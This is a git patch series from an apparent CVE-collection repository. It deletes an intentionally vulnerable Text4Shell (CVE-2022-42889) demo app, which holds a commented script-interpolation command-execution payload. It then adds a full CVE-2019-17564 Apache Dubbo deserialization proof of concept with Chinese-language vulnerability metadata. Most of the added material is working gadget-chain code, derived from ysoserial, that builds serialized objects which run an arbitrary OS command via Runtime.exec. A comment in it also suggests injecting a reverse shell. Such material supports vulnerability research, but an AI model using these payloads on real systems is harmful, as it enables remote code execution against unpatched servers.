org.springframework.boot.autoconfigure.SpringBootApplication; - -@SpringBootApplication -public class DockerApp { - public static void main(String[] args) { - SpringApplication.run(DockerApp.class, args); - } -} diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java deleted file mode 100644 index b4fa1922..00000000 --- a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java +++ /dev/null @@ -1,30 +0,0 @@ -package com.levo.dockerexample.controller; - -import java.util.Date; - -import org.apache.commons.text.StringSubstitutor; - -import org.springframework.web.bind.annotation.ResponseBody; -import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.RequestMethod; -import org.springframework.web.bind.annotation.RequestParam; -import org.springframework.web.bind.annotation.RestController; - -@RestController -@RequestMapping("text4shell") -public class HelloController { - - @RequestMapping(value = "/attack", method = RequestMethod.GET) - @ResponseBody - public String attack(@RequestParam(defaultValue="5up3r541y4n") String search) { - StringSubstitutor interpolator = StringSubstitutor.createInterpolator(); - // String pocstring = "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}"; - try{ - String pwn = interpolator.replace(search); - } catch(Exception e) { - System.out.println(e); - } - return "Search results for: " + search; - } - -} diff --git a/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java deleted file mode 100644 index 300beb32..00000000 --- a/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java +++ /dev/null @@ -1,5 +0,0 @@ -package com.levo.dockerexample; - -public class PlaceHolderForTest { - -} diff --git a/cve/docker/2022/yaml/cve-2022-42889.yaml b/cve/docker/2022/yaml/cve-2022-42889.yaml deleted file mode 100644 index 5672cca7..00000000 --- a/cve/docker/2022/yaml/cve-2022-42889.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: cve-2022-42889 -source: - https://github.com/karthikuj/cve-2022-42889-text4shell-docker -info: - name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 - severity: CRITICAL - description: | - Apache Commons Text执行变量插值,允许动态评估和扩展属性。插值的标准格式是“${prefix:name}”,其中“前缀”用于定位执行插值的org.apache.commons.text.lookup.StringLookup的实例。从版本 1.5 开始一直到 1.9,默认查找实例集包括可能导致任意代码执行或与远程服务器联系的插值器。这些查找是: - “脚本” - 使用 JVM 脚本执行引擎 (javax.script) 执行表达式 - “DNS” - 解析 DNS 记录 - “网址” - 从 URL 加载值,包括从远程服务器加载值 如果使用不受信任的配置值,则在受影响版本中使用插值默认值的应用程序可能容易受到远程代码执行或与远程服务器的意外联系。建议用户升级到Apache Commons Text 1.10.0,默认情况下禁用有问题的插值器。 - scope-of-influence: - Docker 1.5-1.10.0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: cve-2022-42889 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None - tags: Docker,cve2022 \ No newline at end of file -- Gitee From b8f796655ac71a0f1fcb85375ef12cfea083ddc3 Mon Sep 17 00:00:00 2001 From: GQ246 Date: Tue, 11 Apr 2023 15:17:17 +0000 Subject: [PATCH 7/8] add CVE-2019-17564 Signed-off-by: GQ246 --- .../2019/CVE-2019-17564/README.md | 29 +++ cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml | 44 ++++ .../main/java/DubboGadget/DubboGadget.java | 49 +++++ .../src/main/java/DubboGadget/Utils.java | 199 ++++++++++++++++++ 4 files changed, 321 insertions(+) create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/README.md create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/DubboGadget.java create mode 100644 cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/Utils.java diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/README.md b/cve/apache-Dubbo/2019/CVE-2019-17564/README.md new file mode 100644 index 00000000..7aac4f51 --- /dev/null +++ b/cve/apache-Dubbo/2019/CVE-2019-17564/README.md @@ -0,0 +1,29 @@ +# CVE-2019-17564 FastJson + SpringFramework Gadget for Dubbo 2.7.3 +Our full write-up is available at https://www.checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability + +Note that *this is not an exploit*; it is a POC gadget chain used in an exploit used to demonstrate deserialization in scopes containing certain dependencies. + +# Overview +Basic code for creating the Alibaba FastJson + Spring gadget chain, as used to exploit Apache Dubbo in CVE-2019-17564. This code will print, and locally deserialize, a gadget based on dependencies available in the scope of Dubbo 2.7.3, Dubbo Common 2.7.3, and Spring Framework + +# Gadget Chain Structure +1. HashMap.putVal(h,k,v) + a. The result of hashCode(), h, is identical for HotSwappableTargetSource objects, triggering a deeper equals() call on HashMap keys when a second value is inserted +2. HotSwappableTargetSource.equals() +3. XString.equals() +4. com.alibaba.fastjson.JSON.toString() +5. com.alibaba.fastjson.JSON.toJSONString() +6. com.alibaba.fastjson.serializer.MapSerializer.write() +7. TemplatesImpl.getOutputProperties() +8. TemplatesImpl.newTransformer() +9. TemplatesImpl.getTransletInstance() +10. TemplatesImpl.defineTransletClasses() +11. ClassLoader.defineClass() +12. Class.newInstance() +13. MaliciousClass.() +14. Runtime.exec() + +# Credits +Credits are in order to Chris Frohoff and Moritz Bechler for their research and tools (ysoserial and marshalsec), as some of their code was used in the gadget chain, and their research laid the foundation for this exploit. + +Credits are also in order to Checkmarx, who enable this type of research, and our fantastic research group for pitching ideas, reviewing, and bearing the fact that I won't shut up about this type of stuff. diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml b/cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml new file mode 100644 index 00000000..b146abf9 --- /dev/null +++ b/cve/apache-Dubbo/2019/CVE-2019-17564/pom.xml @@ -0,0 +1,44 @@ + + + 4.0.0 + + groupId + DubboGadget + 1.0-SNAPSHOT + + + + maven-compiler-plugin + 3.7.0 + + 1.8 + 1.8 + + + + + + + org.apache.dubbo + dubbo + 2.7.3 + + + org.apache.dubbo + dubbo-remoting-http + 2.7.3 + + + org.springframework + spring-web + 5.1.9.RELEASE + + + com.nqzero + permit-reflect + 0.4 + + + \ No newline at end of file diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/DubboGadget.java b/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/DubboGadget.java new file mode 100644 index 00000000..890073f6 --- /dev/null +++ b/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/DubboGadget.java @@ -0,0 +1,49 @@ +package DubboGadget; + +import com.alibaba.fastjson.JSONObject; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; + +public class DubboGadget { + // PoC OS Command to Execute + public static String DUBBO_RCE_COMMAND = "calc.exe"; + + public static void main(String[] args) throws Exception { + byte[] gadgetBytes = RCEObjectPayload(DUBBO_RCE_COMMAND); + printGadget(gadgetBytes); + // Test gadget locally + // execGadget(gadgetBytes); + } + + public static byte[] RCEObjectPayload(final String command) throws Exception { + Object templates = Utils.createTemplatesImpl(command); // TemplatesImpl gadget chain, which + // triggers Runtime.exec() on + // TemplatesImpl.newTransformer() + JSONObject jo = new JSONObject(); + jo.put("oops",templates); // If JSONObject.toString() is called, + // TemplatesImpl.newTransformer() will be invoked + Object o = Utils.makeXStringToStringTrigger(jo); // toString() gadget chain, which + // triggers on OIS deserialization + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(o); + byte[] gadgetBytes = baos.toByteArray(); + return gadgetBytes; + } + + public static void printGadget(byte[] gadgetBytes) { + System.out.println(new String(gadgetBytes)); + } + + public static void execGadget(byte[] gadgetBytes) throws Exception { + // Show serialized gadget in console + ByteArrayInputStream bais = new ByteArrayInputStream(gadgetBytes); + ObjectInputStream ois = new ObjectInputStream(bais); + Object oopsie = ois.readObject(); + oopsie.toString(); + } +} + diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/Utils.java b/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/Utils.java new file mode 100644 index 00000000..12e43a38 --- /dev/null +++ b/cve/apache-Dubbo/2019/CVE-2019-17564/src/main/java/DubboGadget/Utils.java @@ -0,0 +1,199 @@ +package DubboGadget; + +import java.lang.reflect.*; + +import com.sun.org.apache.xpath.internal.objects.XString; +import org.springframework.aop.target.HotSwappableTargetSource; +import sun.reflect.ReflectionFactory; +import com.nqzero.permit.Permit; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; + +import java.io.Serializable; +import java.util.HashMap; +import java.util.Map; + +import javassist.ClassClassPath; +import javassist.ClassPool; +import javassist.CtClass; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; + + +/* + * Utility class - based on code found in ysoserial, includes method calls used in + * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were + * consolidated into a single util class for the sake of brevity; they are otherwise unchanged. + * + * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger + * to create a toString trigger + * + * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial + * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec + */ +public class Utils { + static { + // special case for using TemplatesImpl gadgets with a SecurityManager enabled + System.setProperty(DESERIALIZE_TRANSLET, "true"); + + // for RMI remote loading + System.setProperty("java.rmi.server.useCodebaseOnly", "false"); + } + + public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler"; + + public static class StubTransletPayload extends AbstractTranslet implements Serializable { + + private static final long serialVersionUID = -5971610431559700674L; + + + public void transform ( DOM document, SerializationHandler[] handlers ) throws TransletException {} + + + @Override + public void transform ( DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {} + } + + // required to make TemplatesImpl happy + public static class Foo implements Serializable { + + private static final long serialVersionUID = 8207363842866235160L; + } + + public static Object createTemplatesImpl ( final String command ) throws Exception { + if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) { + return createTemplatesImpl( + command, + Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), + Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), + Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")); + } + + return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class); + } + + + public static T createTemplatesImpl ( final String command, Class tplClass, Class abstTranslet, Class transFactory ) + throws Exception { + final T templates = tplClass.newInstance(); + + // use template gadget class + ClassPool pool = ClassPool.getDefault(); + pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class)); + pool.insertClassPath(new ClassClassPath(abstTranslet)); + final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName()); + // run command in static initializer + // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections + String cmd = "java.lang.Runtime.getRuntime().exec(\"" + + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + + "\");"; + clazz.makeClassInitializer().insertAfter(cmd); + // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) + clazz.setName("ysoserial.Pwner" + System.nanoTime()); + CtClass superC = pool.get(abstTranslet.getName()); + clazz.setSuperclass(superC); + + final byte[] classBytes = clazz.toBytecode(); + + // inject class bytes into instance + Utils.setFieldValue(templates, "_bytecodes", new byte[][] { + classBytes, Utils.classAsBytes(Utils.Foo.class) + }); + + // required to make TemplatesImpl happy + Utils.setFieldValue(templates, "_name", "Pwnr"); + Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance()); + return templates; + } + + public static void setAccessible(AccessibleObject member) { + // quiet runtime warnings from JDK9+ + Permit.setAccessible(member); + } + + public static Field getField(final Class clazz, final String fieldName) { + Field field = null; + try { + field = clazz.getDeclaredField(fieldName); + setAccessible(field); + } + catch (NoSuchFieldException ex) { + if (clazz.getSuperclass() != null) + field = getField(clazz.getSuperclass(), fieldName); + } + return field; + } + + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + field.set(obj, value); + } + + public static String classAsFile(final Class clazz) { + return classAsFile(clazz, true); + } + + public static String classAsFile(final Class clazz, boolean suffix) { + String str; + if (clazz.getEnclosingClass() == null) { + str = clazz.getName().replace(".", "/"); + } else { + str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); + } + if (suffix) { + str += ".class"; + } + return str; + } + + public static byte[] classAsBytes(final Class clazz) { + try { + final byte[] buffer = new byte[1024]; + final String file = classAsFile(clazz); + final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file); + if (in == null) { + throw new IOException("couldn't find '" + file + "'"); + } + final ByteArrayOutputStream out = new ByteArrayOutputStream(); + int len; + while ((len = in.read(buffer)) != -1) { + out.write(buffer, 0, len); + } + return out.toByteArray(); + } catch (IOException e) { + throw new RuntimeException(e); + } + } + public static HashMap makeMap ( Object v1, Object v2 ) throws Exception { + HashMap s = new HashMap<>(); + Utils.setFieldValue(s, "size", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.HashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.HashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + Utils.setFieldValue(s, "table", tbl); + return s; + } + + public static Object makeXStringToStringTrigger(Object o) throws Exception { + XString x = new XString("HEYO"); + return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x)); + } +} -- Gitee From 8ca19d65bb2ff8f65478c3cac77c53cf4354dd50 Mon Sep 17 00:00:00 2001 From: GQ246 Date: Tue, 11 Apr 2023 15:27:39 +0000 Subject: [PATCH 8/8] add cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml. Signed-off-by: GQ246 --- .../2019/yaml/ CVE-2019-17564.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml diff --git a/cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml b/cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml new file mode 100644 index 00000000..2ae19468 --- /dev/null +++ b/cve/apache-Dubbo/2019/yaml/ CVE-2019-17564.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-17564 +source: https://github.com/Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget +info: + name: Dubbo是一个高性能优秀的服务框架。 + severity: CRITICAL + description: | + 不安全的反序列化发生在启用了HTTP远程处理的Dubbo应用程序中。攻击者可以提交包含 Java 对象的 POST 请求,以完全破坏 Apache Dubbo 的提供者实例(如果该实例启用了 HTTP)。此问题影响了 Apache Dubbo 2.7.0 到 2.7.4、2.6.0 到 2.6.7 以及所有 2.5.x 版本。 + scope-of-influence: + Dubbo 2.5.0-2.5.10 + Dubbo 2.6.0-2.6.7 + Dubbo 2.7.0-2.7.4 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-17564 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-17564 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: cve2019, Dubbo \ No newline at end of file -- Gitee